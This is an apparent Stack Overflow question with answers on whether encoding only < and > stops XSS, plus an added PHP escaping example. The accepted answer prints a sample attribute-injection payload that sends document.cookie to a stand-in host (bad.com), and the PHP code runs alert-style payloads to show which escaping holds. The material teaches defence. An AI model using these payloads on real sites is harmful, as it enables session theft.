[ACCEPTED]-Is replacing : < and > with &lt; and &gt; enough to prevent XSS injection?-code-injection

Accepted answer
Score: 19

It depends very much on context.

Check out this example, from a typical forum site...

You may hotlink your avatar image. Enter the full URL.

Malicious user enters in the input field:

http://www.example.com/image.png" onload="window.location = 'http://www.bad.com/giveme.php?cookie=' + encodeURI(document.cookie) 

There is no less than or greater than in there to encode, but it is still a big security hole.

With htmlspecialchars(), I found it a good idea to make (or use) a wrapper function around it that casts to a string, provides an easier way to disable double encoding (if necessary) and ensures it is using the correct character set of your application. Kohana has a great example.

Score: 6

You should also take double quotes ", single quotes ' and ampersands & into account. If you do all that during displaying/generating the output, then yes, it's enough.

You should only ensure that you do this for any user-controlled input, such as request parameters, the request URL, request headers and user-controlled input which has been stored in a datastore.

In PHP you can do that with htmlspecialchars() and in JSP you can do that with JSTL <c:out>.
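Added example for both answers above (my own PHP, not code from either poster or from Kohana): it puts the accepted answer's avatar payload through an "angle brackets only" escaper and then through an htmlspecialchars() wrapper of the kind the answer describes (cast to string, double-encode switch, explicit charset), and also shows the second answer's point about quotes and ampersands. It assumes PHP 8; the function names escapeAngleOnly and e, the sample inputs and the charset are assumptions.

```php
<?php
// Added example, not code from either answer. Assumes PHP 8; all names and
// sample inputs are constructed for illustration.

/** The naive approach from the question: encode only < and >. */
function escapeAngleOnly(string $s): string
{
    return str_replace(['<', '>'], ['&lt;', '&gt;'], $s);
}

/**
 * Wrapper around htmlspecialchars(): casts to string, always encodes both
 * quote styles and the ampersand, uses the application charset, and lets the
 * caller turn double encoding off for data that is already encoded.
 * ENT_SUBSTITUTE replaces invalid byte sequences instead of returning "".
 */
function e(mixed $value, bool $doubleEncode = true, string $charset = 'UTF-8'): string
{
    return htmlspecialchars(
        (string) $value,
        ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5,
        $charset,
        $doubleEncode
    );
}

// Constructed attacker input modelled on the avatar example: no < or >,
// just a double quote that closes the src attribute and starts a new one.
$avatar = 'http://www.example.com/image.png" onload="alert(document.cookie)';

// 1. Angle-bracket-only escaping inside a quoted attribute: the quote
//    survives, so the browser sees a real onload attribute.
echo '<img src="' . escapeAngleOnly($avatar) . '">', PHP_EOL;
// <img src="http://www.example.com/image.png" onload="alert(document.cookie)">

// 2. Same template with the wrapper: the quote becomes &quot;, the whole
//    payload stays inside src, and nothing executes.
echo '<img src="' . e($avatar) . '">', PHP_EOL;
// <img src="http://www.example.com/image.png&quot; onload=&quot;alert(document.cookie)">

// 3. Why the ampersand must be encoded and why the double-encode switch
//    exists: a value that was already encoded once before being stored.
$stored = 'Tom &amp; Jerry';
echo e($stored), PHP_EOL;          // Tom &amp;amp; Jerry  (browser shows "&amp;")
echo e($stored, false), PHP_EOL;   // Tom &amp; Jerry      (browser shows "&")

// 4. The cast: htmlspecialchars() wants a string, the wrapper takes whatever
//    the template hands it (int, float, null).
echo e(42), ' ', e(null), ' ', e(3.5), PHP_EOL;   // 42  3.5

// 5. Context still matters even with ENT_QUOTES: in an unquoted attribute a
//    space ends the value, and htmlspecialchars() leaves spaces alone.
$bad = 'x onload=alert(1)';
echo '<img src=' . e($bad) . '>', PHP_EOL;    // <img src=x onload=alert(1)>   still XSS
echo '<img src="' . e($bad) . '">', PHP_EOL;  // <img src="x onload=alert(1)"> inert
```

Case 5 is the practical reading of "it depends very much on context": the wrapper makes a value safe as HTML text or inside a quoted attribute, so always quote the attribute you write it into; a value that ends up in a URL, a script block or a CSS rule needs the encoding rules of that context in addition to this one.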
